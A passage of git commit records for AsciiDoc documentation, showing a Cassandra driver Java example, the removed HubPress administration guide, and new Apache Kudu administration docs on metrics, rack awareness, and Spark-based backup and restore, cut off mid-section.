E.g., using a particular resource from the Cassandra driver:\n\n[source,java]\n----\nCassandraConfiguration configuration = new CassandraConfiguration();\ntry (CassandraDocumentEntityManagerFactory managerFactory = configuration.get()) {\n    CassandraColumnFamilyManager columnEntityManager = managerFactory.get(KEY_SPACE);\n    ColumnEntity entity = ColumnEntity.of(COLUMN_FAMILY);\n    Column id = Column.of(\"id\", 10L);\n    entity.add(id);\n    entity.add(Column.of(\"version\", 0.001));\n    entity.add(Column.of(\"name\", \"Diana\"));\n    entity.add(Column.of(\"options\", Arrays.asList(1, 2, 3)));\n    columnEntityManager.save(entity);\n    \/\/common implementation\n    ColumnQuery query = ColumnQuery.of(COLUMN_FAMILY);\n    query.and(ColumnCondition.eq(id));\n    Optional<ColumnEntity> result = columnEntityManager.singleResult(query);\n    \/\/cassandra implementation\n    columnEntityManager.save(entity, ConsistencyLevel.THREE);\n    List<ColumnEntity> entities = columnEntityManager.cql(\"select * from newKeySpace.newColumnFamily\");\n    System.out.println(entities);\n}\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3811d98f8f90aeee0086fd8d45ba4e3ad0b3eda6","subject":"Migrated Admin content to gitbook","message":"Migrated Admin content to gitbook","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io","old_file":"docs\/Administration.adoc","new_file":"docs\/Administration.adoc","new_contents":"","old_contents":":toc: macro\n:toclevels: 4\n:sectnums:\n\n= Administration Guide\n\nThis guide will help you get the most out of your HubPress blog. It will teach you how to configure the various features of your blog so you can make it your own.\n\nIf you don't care too much about customising your blog at this stage, and just want to start writing, review the helpful info in the link:Writers_Guide.adoc[Writer's Guide] to get you writing blog posts the right way.\n\nNOTE: You do not need any special systems administration knowledge to use HubPress. 
We've split out the Administration information so the README remains small in size.\n\ntoc::[]\n\n== About the Administration Console\n\nThe HubPress Administration Console is available at *\/hubpress*:\n\n* `https:\/\/[username].github.io\/hubpress\/` for GitHub Hosted blogs, or\n* `https:\/\/[username].github.io\/[repositoryName]\/hubpress\/` for Domain Hosted blogs, or\n* `https:\/\/[cname_domain]\/hubpress` for custom domain-hosted (CNAME) blogs.\n\nNOTE: If you are using a CNAME, you might need to access your Administration console using the `https:\/\/<username>.github.io` address pattern initially, so your CNAME redirect will work.\n\n== Log Into the Administration Console\n\nimage:http:\/\/hubpress.io\/img\/login.png[Install complete,300]\n\nEnter your GitHub credentials to log into HubPress Admin.\n\nOnce you authenticate, a personal token is created for future calls from HubPress to the GitHub API.\n\nThis is synchronized across all sessions of HubPress.\nIf you open the Administration Console on your PC and then your tablet, the token is applicable to all devices.\n\n== Posts View\n\nThe `Posts` view is the default view you see when you first log onto HubPress.\n\nWhen you first start HubPress, the `Posts` view is empty.\nAs you create blog posts, the page populates with the list of posts on the left, and a rendered preview of the blog post itself on the right.\n\n=== Add a Blog Post\n\nTo start blogging with HubPress, click the pencil icon in the top right of the screen.\n\nThis creates an empty blog post for you, ready for your next great idea, or discovery you want to tell the world about.\n\nThere are certain structural requirements you must meet in a HubPress blog post, before it can be saved and published to your blog site. See the link:Writers_Guide.adoc[Writer's Guide] for tips about creating posts successfully with HubPress.\n\n=== Edit or Delete a Blog Post\n\n.New in 0.5.0\nNOTE: You can now delete blog posts instead of having to rename them and use them again later.\n\nIf you have a post you need to edit or delete, you can do so by accessing the Action Overflow (three dots) menu.\n\nThis menu contains the `Edit` and `Delete` functions applicable to each post.\n\n== Settings View\n\nYou can configure basic blog settings (such as CNAME and Pagination) and social media accounts you want to connect to your blog.\n\nEach settings group is separated into tabs, to logically group the settings.\n\n.How To Access the Settings View\n. On the Posts View, click the Menu button.\n. 
Click Settings to load the Settings view.\n\n=== Meta\n\nThis tab contains basic information configured in the `\/hubpress\/config.json` file.\n\nThe following fields are configurable:\n\nGit CNAME::\n Lets you specify a custom domain name for your blog.\n See https:\/\/help.github.com\/articles\/setting-up-a-custom-domain-with-github-pages\/[Setting Up A Custom Domain] for instructions about setting up a CNAME for your blog.\nLive Preview Render Delay::\n Controls how long the live render takes to refresh, in milliseconds.\n For fast typists, setting this field to a value over `2000` (two seconds) will result in a smoother editing experience because the live preview will not be regenerated so frequently.\n Setting this value below `2000` will result in the live preview refreshing faster, but may result in some visible cursor delay when typing.\n\n=== Site\n\n==== Title and Description\n\nThe *Title* and *Description* fields allow you to give your blog a name, and tell visitors what they can expect from your blog posts.\n\n==== Logo and Cover Image\n\nThe *Logo* and *Cover Image* fields allow you to specify the art assets that will be used on each page of your blog:\n\n* An HTML link to an image hosting service. For example, Gravatar for your avatar.\n* A link to an image committed to the \/images directory of your blog repository.\n\nIMPORTANT: The format you specify in these fields is important for repository-hosted images.\n\nYou must use the pattern `\/images\/<filename>` so the static site generator can create the image paths to each sub-page of your blog.\nFailing to specify the leading forward-slash will mean the absolute path generated in the HTML pages will break.\nYou'll know this has happened when Page 2 of your blog onwards does not have any cover or logo images.\n\nSee the link:Writers_Guide.adoc#Adding_Images[Adding Images] section in the Writer's Guide for more information about using images.\n\n==== Theme\n\nThe *Theme* is selectable from the list of themes stored in the `\/themes` directory.\n\nThis field is a free-text field, but you need to specify the theme according to the folder name.\nThe current folder names are:\n\n* casper\n* ghostium\n* ichi\n* roon\n* saga\n* uno\n* uno-zen\n\n.New in 0.5.0\nNOTE: Theme names have all been changed to lowercase for consistency.\nIf you find your theme is not loading, check the site settings and adjust the names accordingly.\n\n==== Google Analytics\n\nThe *Google Analytics* field takes the Google Analytics Tracking ID of your site. 
For example `UA-1234567-1`.\n\n==== Disqus Shortname\n\nThe *Disqus shortname* field takes your Disqus user name that you specified when registering a new site for Disqus.\n\nOnly the shortname is required, not a link to your profile page.\n\nIf you have not enabled Disqus for your site, create a site profile at https:\/\/disqus.com\/admin\/create\/ with the name of your blog to get started.\n\n=== Social Network\n\nAll fields in this group require full URLs to your public profile page.\nThe way these values are rendered on your blog depends on the theme selected.\n\n== Update HubPress\n\nBecause HubPress is hosted on GitHub, you can update by pulling down the latest changes from the HubPress master repository.\n\nIf you're new to GitHub, the repository you forked the project from is referred to as `Upstream`.\n\nYou update HubPress by creating a Pull Request (PR) against the hubpress.io upstream repository.\n\nWith the cross-compare fork feature of GitHub, you can easily update to the latest version.\n\n.How To Update Your HubPress Instance to the Latest Version\n. Click the `Compare` button in your HubPress repository.\n+\nimage::https:\/\/raw.githubusercontent.com\/HubPress\/dev.hubpress.io\/e57b221\/docs\/images\/maintain_the_latest_hubpress_01.png[Click Compare button]\n+\n. Change the base fork to your repository, and set the branch according to your repository configuration (`master` or `gh-pages`).\n+\nimage::https:\/\/raw.githubusercontent.com\/HubPress\/dev.hubpress.io\/e57b221\/docs\/images\/maintain_the_latest_hubpress_02.png[Set the base fork]\n+\n. Select `Compare across forks`.\n+\nimage::https:\/\/raw.githubusercontent.com\/HubPress\/dev.hubpress.io\/e57b221\/docs\/images\/maintain_the_latest_hubpress_03.png[Click compare across forks]\n+\n. Change the head fork to the `HubPress\/hubpress.io` repository.\n+\nimage::https:\/\/raw.githubusercontent.com\/HubPress\/dev.hubpress.io\/e57b221\/docs\/images\/maintain_the_latest_hubpress_04.png[Set the head fork]\n+\n. Create the Pull Request.\n. Apply the Pull Request to your instance of HubPress.\n\nYou can use the most recent HubPress version after applying the PR to your repository.\n\nFor a video demonstration of the PR process, see the following YouTube video.\n\nvideo::KCylB780zSM[youtube]\n\nhttps:\/\/www.youtube.com\/watch?v=KCylB780zSM[Updating HubPress]
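\nIf you prefer the command line over the web UI, the same update can be done with plain git. A minimal sketch, assuming your blog repository uses the `master` branch (substitute `gh-pages` if that is how your repository is configured):\n\n[source,bash]\n----\n# inside a local clone of your blog repository\ngit remote add upstream https:\/\/github.com\/HubPress\/hubpress.io.git\ngit fetch upstream\ngit merge upstream\/master\ngit push origin master\n----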
\n== Use HubPress with Multiple Users\n\n.New in 0.5.0\nNOTE: You can now work as a team on blog posts.\nEach user granted access to the blog instance is credited with their GitHub name on posts they create.\n\nYou can use the same HubPress instance with multiple authors by adding contributors to the repo in which HubPress is hosted.\n\nAttribution::\n Posts are attributed based on the first person who created the blog post entry.\n Edits by other contributors are attributed to the first person who created the post.\nSite Changes::\n Changes to settings (themes, blog name, social links) _will not_ affect the author data attributed to each post.\n\n.How To Add Contributors to your HubPress Repository\n. Open your HubPress site on GitHub.\n. Click `Settings` => `Collaborators`.\n. Add the GitHub users to whom you want to grant access to your blog.\n\nOnce you have added contributors, they will be notified by the GitHub notification system. Once they accept the invitation, they can instantly contribute to content development on the blog.\n\n== Troubleshooting\n\nHubPress' unique authoring environment is backed by a locally-stored database, specific to your browser and operating system.\n\nIf you switch devices or browser instances, you lose the synchronicity between browsers.\nHubPress subsequently gets a globally-corrupted GitHub authentication token, and any attempts to synchronize changes from the primary Chrome instance fail.\n\nIn most cases, resetting the Hosted App Data in the browser is all it takes to bring normality back to your HubPress fork.\n\n=== Resetting Blog Database on Android\n\nClear the browser Cache and Data in Android.\n\n. Tap Settings > Apps > Chrome.\n. Clear Cache and Data.\n. Restart the Chrome App.\n\nHubPress is forced to rebuild the local database, and will resync its GitHub authentication token.\n\n=== Resetting Blog Database on Desktop\n\nChrome Desktop shares similar behavior with Chrome for Android.\n\nRather than having to reset the entire cache and data in the app, Chrome Desktop is a little less extreme in what you need to reset.\n\n. Close the malfunctioning HubPress tab in the browser.\n. Click `Settings`.\n. Click `Show advanced settings`.\n. In the `Privacy` group, click `Clear browsing data`.\n. Select \"Obliterate the following items from: `The beginning of time`\".\n. Clear all check-marks *except for* `Hosted app data`.\n. Click `Clear browsing data`.\n. Open a tab, and load the HubPress Admin Console for your blog.\n. Attempt to republish a post.\n\nYou should have a successful post publish where the process previously failed.\n\n== Frequently Asked Questions\n\nThere are some commonly-asked questions in the issue tracker that are worth calling out here.\n\n=== Can I Specify Other Asciidoctor Backends?\n\nHubPress only supports the HTML5 backend.\n\nSpecifying other backend types will result in an error similar to:\n\n Uncaught RuntimeError: asciidoctor: FAILED: missing converter for backend 'deckjs'. 
Processing aborted.\n\nIf you do want to use a different backend to process your AsciiDoc files, the http:\/\/asciidoctor.org\/docs\/user-manual\/#selecting-an-output-format[Asciidoctor User Guide] can help you work out the backend that is right for you, for use with the +asciidoctor+ command-line script.\n\n=== Can I create posts in my repository, and not through the interface?\n\nYou can edit your posts in a local copy of your HubPress repository, however you will need to log onto HubPress Admin to publish your post.\n\nIf you want a near WYSIWYG interface to edit your AsciiDoc files, applications like http:\/\/atom.io[Atom Editor] or http:\/\/asciidocfx.com[AsciidocFX Editor] are excellent choices.\n\n== Donations\n\nHubPress is now on https:\/\/gratipay.com\/hubpress\/[Gratipay]!\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/12901016\/7b09da22-ceb9-11e5-93f7-16ab135b2e2e.png[]\n\nIt's not the only way you can help us, but it is certainly a welcome one.\nDonations are a great way to show your appreciation for the platform: it inspires us to dedicate extra time away from our families and day jobs to make HubPress an awesome blogging platform for you.\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/12901085\/cc5ee908-ceb9-11e5-9d8b-c526f081f1e9.png[]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"200509b497a028f7d700152ca4c92818ce5b9f0e","subject":"docs: add docs for maintenance mode","message":"docs: add docs for maintenance mode\n\nA staged version can be found here:\nhttps:\/\/github.com\/andrwng\/kudu\/blob\/docs_maintenance_mode\/docs\/administration.adoc#minimizing_cluster_disruption_during_temporary_single_ts_downtime\n\nChange-Id: I36b9eddc1d4d4a4e4cb149058fc6d6f438e47f1f\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/14718\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n[[administration]]\n= Apache Kudu Administration\n\n:author: Kudu Team\n:imagesdir: .\/images\n:icons: font\n:toc: left\n:toclevels: 3\n:doctype: book\n:backend: html5\n:sectlinks:\n:experimental:\n\n== Starting and Stopping Kudu Processes\n\nNOTE: These instructions are relevant only when Kudu is installed using operating system packages\n(e.g. 
`rpm` or `deb`).\n\ninclude::installation.adoc[tags=start_stop]\n\n== Kudu Web Interfaces\n\nKudu tablet servers and masters expose useful operational information on a built-in web interface.\n\n=== Kudu Master Web Interface\n\nKudu master processes serve their web interface on port 8051. The interface exposes several pages\nwith information about the cluster state:\n\n- A list of tablet servers, their host names, and the time of their last heartbeat.\n- A list of tables, including schema and tablet location information for each.\n- SQL code which you can paste into Impala Shell to add an existing table to Impala's list of known data sources.\n\n=== Kudu Tablet Server Web Interface\n\nEach tablet server serves a web interface on port 8050. The interface exposes information\nabout each tablet hosted on the server, its current state, and debugging information\nabout maintenance background operations.\n\n=== Common Web Interface Pages\n\nBoth Kudu masters and tablet servers expose a common set of information via their web interfaces:\n\n- HTTP access to server logs.\n- an `\/rpcz` endpoint which lists currently running RPCs via JSON.\n- pages giving an overview and detailed information on the memory usage of different\n components of the process.\n- information on the current set of configuration flags.\n- information on the currently running threads and their resource consumption.\n- a JSON endpoint exposing metrics about the server.\n- information on the deployed version number of the daemon.\n\nThese interfaces are linked from the landing page of each daemon's web UI.\n\n== Kudu Metrics\n\nKudu daemons expose a large number of metrics. Some metrics are associated with an entire\nserver process, whereas others are associated with a particular tablet replica.\n\n=== Listing available metrics\n\nThe full set of available metrics for a Kudu server can be dumped via a special command\nline flag:\n\n[source,bash]\n----\n$ kudu-tserver --dump_metrics_json\n$ kudu-master --dump_metrics_json\n----\n\nThis will output a large JSON document. Each metric indicates its name, label, description,\nunits, and type. Because the output is JSON-formatted, this information can easily be\nparsed and fed into other tooling which collects metrics from Kudu servers.\n\n=== Collecting metrics via HTTP\n\nMetrics can be collected from a server process via its HTTP interface by visiting\n`\/metrics`. The output of this page is JSON for easy parsing by monitoring services.\nThis endpoint accepts several `GET` parameters in its query string:\n\n- `\/metrics?metrics=<substring1>,<substring2>,...` - limits the returned metrics to those which contain\nat least one of the provided substrings. The substrings also match entity names, so this\nmay be used to collect metrics for a specific tablet.\n\n- `\/metrics?include_schema=1` - includes metrics schema information such as unit, description,\nand label in the JSON output. This information is typically elided to save space.\n\n- `\/metrics?compact=1` - eliminates unnecessary whitespace from the resulting JSON, which can decrease\nbandwidth when fetching this page from a remote host.\n\n- `\/metrics?include_raw_histograms=1` - include the raw buckets and values for histogram metrics,\nenabling accurate aggregation of percentile metrics over time and across hosts.\n\n- `\/metrics?level=info` - limits the returned metrics based on their severity level.\nThe levels are ordered and lower levels include the levels above them. 
If no level is specified,\n`debug` is used to include all metrics. The valid values are:\n * `debug` - Metrics that are diagnostically helpful but generally not monitored\n during normal operation.\n * `info` - Generally useful metrics that operators always want to have available\n but may not be monitored under normal circumstances.\n * `warn` - Metrics which can often indicate operational oddities, which may need more investigation.\n\nFor example:\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?include_schema=1&metrics=connections_accepted'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"server\",\n \"id\": \"kudu.tabletserver\",\n \"attributes\": {},\n \"metrics\": [\n {\n \"name\": \"rpc_connections_accepted\",\n \"label\": \"RPC Connections Accepted\",\n \"type\": \"counter\",\n \"unit\": \"connections\",\n \"description\": \"Number of incoming TCP connections made to the RPC server\",\n \"value\": 92\n }\n ]\n }\n]\n----\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?metrics=log_append_latency'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"tablet\",\n \"id\": \"c0ebf9fef1b847e2a83c7bd35c2056b1\",\n \"attributes\": {\n \"table_name\": \"lineitem\",\n \"partition\": \"hash buckets: (55), range: [(<start>), (<end>))\",\n \"table_id\": \"\"\n },\n \"metrics\": [\n {\n \"name\": \"log_append_latency\",\n \"total_count\": 7498,\n \"min\": 4,\n \"mean\": 69.3649,\n \"percentile_75\": 29,\n \"percentile_95\": 38,\n \"percentile_99\": 45,\n \"percentile_99_9\": 95,\n \"percentile_99_99\": 167,\n \"max\": 367244,\n \"total_sum\": 520098\n }\n ]\n }\n]\n----\n\nNOTE: All histograms and counters are measured since the server start time, and are not reset upon collection.\n\n=== Diagnostics Logging\n\nKudu may be configured to dump various diagnostics information to a local log file.\nThe diagnostics log will be written to the same directory as the other Kudu log files, with a\nsimilar naming format, substituting `diagnostics` instead of a log level like `INFO`.\nAfter any diagnostics log file reaches 64MB uncompressed, the log will be rolled and\nthe previous file will be gzip-compressed.\n\nEach line in the diagnostics log consists of the following components:\n\n* A human-readable timestamp formatted in the same fashion as the other Kudu log files.\n* The type of record. For example, a metrics record consists of the word `metrics`.\n* A machine-readable timestamp, in microseconds since the Unix epoch.\n* The record itself.\n\nCurrently, the only type of diagnostics record is a periodic dump of the server metrics.\nEach record is encoded in compact JSON format, and the server attempts to elide any metrics\nwhich have not changed since the previous record. In addition, counters which have never\nbeen incremented are elided. Otherwise, the format of the JSON record is identical to the\nformat exposed by the HTTP endpoint above.\n\nThe frequency with which metrics are dumped to the diagnostics log is configured using the\n`--metrics_log_interval_ms` flag. By default, Kudu logs metrics every 60 seconds.\n\n[[rack_awareness]]\n== Rack Awareness\n\nAs of version 1.9, Kudu supports a rack awareness feature. Kudu's ordinary\nre-replication methods ensure the availability of the cluster in the event of a\nsingle node failure. However, clusters can be vulnerable to correlated failures\nof multiple nodes. For example, all of the physical hosts on the same rack in\na datacenter may become unavailable simultaneously if the top-of-rack switch\nfails. 
Kudu's rack awareness feature provides protection from some kinds of\ncorrelated failures, like the failure of a single rack in a datacenter.\n\nThe first element of Kudu's rack awareness feature is location assignment. When\na tablet server or client registers with a master, the master assigns it a\nlocation. A location is a `\/`-separated string that begins with a `\/` and where\neach `\/`-separated component consists of characters from the set\n`[a-zA-Z0-9_-.]`. For example, `\/dc-0\/rack-09` is a valid location, while\n`rack-04` and `\/rack=1` are not valid locations. Thus location strings resemble\nabsolute UNIX file paths where characters in directory and file names are\nrestricted to the set `[a-zA-Z0-9_-.]`. Presently, Kudu does not use the\nhierarchical structure of locations, but it may in the future. Location\nassignment is done by a user-provided command, whose path should be specified\nusing the `--location_mapping_cmd` master flag. The command should take a single\nargument, the IP address or hostname of a tablet server or client, and return\nthe location for the tablet server or client. Make sure that all Kudu masters\nare using the same location mapping command.\n\nThe second element of Kudu's rack awareness feature is the placement policy,\nwhich is\n\n Do not place a majority of replicas of a tablet on tablet servers in the same location.\n\nThe leader master, when placing newly created replicas on tablet servers and\nwhen re-replicating existing tablets, will attempt to place the replicas in a\nway that complies with the placement policy. For example, in a cluster with five\ntablet servers `A`, `B`, `C`, `D`, and `E`, with respective locations `\/L0`,\n`\/L0`, `\/L1`, `\/L1`, `\/L2`, to comply with the placement policy a new 3x\nreplicated tablet could have its replicas placed on `A`, `C`, and `E`, but not\non `A`, `B`, and `C`, because then the tablet would have 2\/3 replicas in\nlocation `\/L0`. As another example, if a tablet has replicas on tablet servers\n`A`, `C`, and `E`, and then `C` fails, the replacement replica must be placed on\n`D` in order to comply with the placement policy.\n\nIn the case where it is impossible to place replicas in a way that complies with\nthe placement policy, Kudu will violate the policy and place a replica anyway.\nFor example, using the setup described in the previous paragraph, if a tablet\nhas replicas on tablet servers `A`, `C`, and `E`, and then `E` fails, Kudu will\nre-replicate the tablet onto one of `B` or `D`, violating the placement policy,\nrather than leaving the tablet under-replicated indefinitely. The\n`kudu cluster rebalance` tool can reestablish the placement policy if it is\npossible to do so. The `kudu cluster rebalance` tool can also be used to\nestablish the placement policy on a cluster if the cluster has just been\nconfigured to use the rack awareness feature and existing replicas need to be\nmoved to comply with the placement policy. See\n<<rebalancer_tool_with_rack_awareness,running the tablet rebalancing tool on a rack-aware cluster>>\nfor more information.\n\nThe third and final element of Kudu's rack awareness feature is the use of\nclient locations to find \"nearby\" servers. As mentioned, the masters also\nassign a location to clients when they connect to the cluster. The client\n(whether Java, {cpp}, or Python) uses its own location and the locations of\ntablet servers in the cluster to prefer \"nearby\" replicas when scanning in\n`CLOSEST_REPLICA` mode. 
Clients choose replicas to scan in the following order:\n\n. Scan a replica on a tablet server on the same host, if there is one.\n. Scan a replica on a tablet server in the same location, if there is one.\n. Scan some replica.\n\nFor example, using the cluster setup described above, if a client on the same\nhost as tablet server `A` scans a tablet with replicas on tablet servers\n`A`, `C`, and `E` in `CLOSEST_REPLICA` mode, it will choose to scan from the\nreplica on `A`, since the client and the replica on `A` are on the same host.\nIf the client scans a tablet with replicas on tablet servers `B`, `C`, and `E`,\nit will choose to scan from the replica on `B`, since it is in the same\nlocation as the client, `\/L0`. If there are multiple replicas meeting a\ncriterion, one is chosen arbitrarily.\n\n[[backup]]\n== Backup and Restore\n\n[[logical_backup]]\n=== Logical backup and restore\n\nAs of Kudu 1.10.0, Kudu supports both full and incremental table backups via a\njob implemented using Apache Spark. Additionally, it supports restoring tables\nfrom full and incremental backups via a restore job implemented using Apache Spark.\n\nGiven the Kudu backup and restore jobs use Apache Spark, ensure Apache Spark\nis installed in your environment following the\nlink:https:\/\/spark.apache.org\/docs\/latest\/#downloading[Spark documentation].\nAdditionally review the Apache Spark documentation for\nlink:https:\/\/spark.apache.org\/docs\/latest\/submitting-applications.html[Submitting Applications].\n\n==== Backing up tables\n\nTo back up one or more Kudu tables, the `KuduBackup` Spark job can be used.\nThe first time the job is run for a table, a full backup will be run.\nAdditional runs will perform incremental backups which will only contain the\nrows that have changed since the initial full backup. A new set of full\nbackups can be forced at any time by passing the `--forceFull` flag to the\nbackup job.\n\nThe common flags that will be used when taking a backup are:\n\n* `--rootPath`: The root path to output backup data. Accepts any Spark-compatible path.\n** See <<backup_directory>> for the directory structure used in the `rootPath`.\n* `--kuduMasterAddresses`: Comma-separated addresses of Kudu masters. Default: localhost\n* `<table>...`: A list of tables to be backed up.\n\nNote: You can see the full list of job options at any time by passing the `--help` flag.\n\nBelow is a full example of a `KuduBackup` job execution which will back up the tables\n`foo` and `bar` to the HDFS directory `kudu-backups`:\n\n[source,bash]\n----\nspark-submit --class org.apache.kudu.backup.KuduBackup kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n foo bar\n----\n\n==== Restoring tables from Backups\n\nTo restore one or more Kudu tables, the `KuduRestore` Spark job can be used.\nFor each backed up table, the `KuduRestore` job will restore the full backup\nand each associated incremental backup until the full table state is restored.\nRestoring the full series of full and incremental backups is possible because\nthe backups are linked via the `from_ms` and `to_ms` fields in the backup metadata.\nBy default the restore job will create tables with the same name as the table\nthat was backed up. If you want to side-load the tables without affecting the\nexisting tables, you can pass `--tableSuffix` to append a suffix to each\nrestored table, as shown in the sketch below.
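\nA hedged sketch of such a side-load restore (the `_restore` suffix, master addresses, and paths are illustrative):\n\n[source,bash]\n----\n# restores table 'foo' as 'foo_restore', leaving the live table untouched\nspark-submit --class org.apache.kudu.backup.KuduRestore kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n --tableSuffix _restore \\\n foo\n----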
\nThe common flags that will be used when restoring are:\n\n* `--rootPath`: The root path to the backup data. Accepts any Spark-compatible path.\n** See <<backup_directory>> for the directory structure used in the `rootPath`.\n* `--kuduMasterAddresses`: Comma-separated addresses of Kudu masters. Default: `localhost`\n* `--createTables`: If set to `true`, the restore process creates the tables.\n Set to `false` if the target tables already exist. Default: `true`.\n* `--tableSuffix`: If set, the suffix to add to the restored table names.\n Only used when `createTables` is `true`.\n* `--timestampMs`: A UNIX timestamp in milliseconds that defines the latest time\n to use when selecting restore candidates. Default: `System.currentTimeMillis()`\n* `<table>...`: A list of tables to restore.\n\nNote: You can see the full list of job options at any time by passing the `--help` flag.\n\nBelow is a full example of a `KuduRestore` job execution which will restore the tables\n`foo` and `bar` from the HDFS directory `kudu-backups`:\n\n[source,bash]\n----\nspark-submit --class org.apache.kudu.backup.KuduRestore kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n foo bar\n----\n\n==== Backup tools\n\nAn additional `backup-tools` jar is available to provide some backup exploration and\ngarbage collection capabilities. This jar does not use Spark directly, but instead\nonly requires the Hadoop classpath to run.\n\nCommands:\n\n* `list`: Lists the backups in the rootPath.\n* `clean`: Cleans up old backup data in the rootPath.\n\nNote: You can see the full list of command options at any time by passing the `--help` flag.\n\nBelow is an example execution which will print the command options:\n\n[source,bash]\n----\njava -cp $(hadoop classpath):kudu-backup-tools-1.10.0.jar org.apache.kudu.backup.KuduBackupCLI --help\n----
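\nAs a further hedged sketch, listing the backups stored under the root path used in the examples above might look like the following (the exact flags accepted by the CLI should be verified with `--help` first):\n\n[source,bash]\n----\n# assumed invocation: list backups under the same root path as the jobs above\njava -cp $(hadoop classpath):kudu-backup-tools-1.10.0.jar org.apache.kudu.backup.KuduBackupCLI list --rootPath hdfs:\/\/\/kudu-backups\n----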
\n[[backup_directory]]\n==== Backup Directory Structure\n\nThe backup directory structure in the `rootPath` is considered an internal detail\nand could change in future versions of Kudu. Additionally, the format and content\nof the data and metadata files is meant for the backup and restore process only\nand could change in future versions of Kudu. That said, understanding the structure\nof the backup `rootPath` and how it is used can be useful when working with Kudu backups.\n\nThe backup directory structure in the `rootPath` is as follows:\n\n[source,bash]\n----\n\/<rootPath>\/<tableId>-<tableName>\/<backup-id>\/\n .kudu-metadata.json\n part-*.<format>\n----\n\n* `rootPath`: Can be used to distinguish separate backup groups, jobs, or concerns.\n* `tableId`: The unique internal ID of the table being backed up.\n* `tableName`: The name of the table being backed up.\n** Note: Table names are URL encoded to prevent pathing issues.\n* `backup-id`: A way to uniquely identify\/group the data for a single backup run.\n* `.kudu-metadata.json`: Contains all of the metadata to support recreating the table,\n linking backups by time, and handling data format changes.\n** Written last so that failed backups will not have a metadata file and will not be\n considered at restore time or backup linking time.\n* `part-*.<format>`: The data files containing the table's data.\n** Currently 1 part file per Kudu partition.\n** Incremental backups contain an additional \u201cRowAction\u201d byte column at the end.\n** Currently the only supported format\/suffix is `parquet`.\n\n==== Troubleshooting\n\n===== Generating a table list\n\nTo generate a list of tables to back up, using the `kudu table list` tool along\nwith `grep` can be useful. Below is an example that will generate a list\nof all tables that start with `my_db.`:\n\n[source,bash]\n----\nkudu table list <master_addresses> | grep \"^my_db\\.*\" | tr '\\n' ' '\n----\n\n*Note*: This list could be saved as a part of your backup process to be used\nat restore time as well.\n\n===== Spark Tuning\n\nIn general the Spark jobs were designed to run with minimal tuning and configuration.\nYou can adjust the number of executors and resources to increase parallelism and performance\nusing Spark's\nlink:https:\/\/spark.apache.org\/docs\/latest\/configuration.html[configuration options].\n\nIf your tables are super wide and your default memory allocation is fairly low, you\nmay see jobs fail. To resolve this, increase the Spark executor memory. A conservative\nrule of thumb is 1 GiB per 50 columns.\n\nIf your Spark resources drastically outscale the Kudu cluster, you may want to limit the\nnumber of concurrent tasks allowed to run on restore.\n\n===== Backups on Kudu 1.9 and earlier\n\nIf your Kudu cluster is version 1.9 or earlier, you can still use the backup tool\nintroduced in Kudu 1.10 to back up your tables. However, because the incremental\nbackup feature requires server-side changes, you are limited to full backups only.\nThe process to back up tables is the same as documented above, but you will need to\ndownload and use the kudu-backup jar from a Kudu 1.10+ release. Before running\nthe backup job you should adjust the configuration of your servers by setting\n`--tablet_history_max_age_sec=604800`. This is the new default value in Kudu 1.10+\nto ensure long running backup jobs can complete successfully and consistently.\nAdditionally, when running the backup you need to pass `--forceFull` to disable\nthe incremental backup feature. Now each time the job is run, a full backup will be\ntaken, as in the sketch below.
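\nPutting those two adjustments together, a minimal sketch of a full-only backup run against a 1.9 cluster (jar version, master addresses, and paths are illustrative):\n\n[source,bash]\n----\n# tablet servers restarted beforehand with --tablet_history_max_age_sec=604800\nspark-submit --class org.apache.kudu.backup.KuduBackup kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n --forceFull \\\n foo bar\n----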
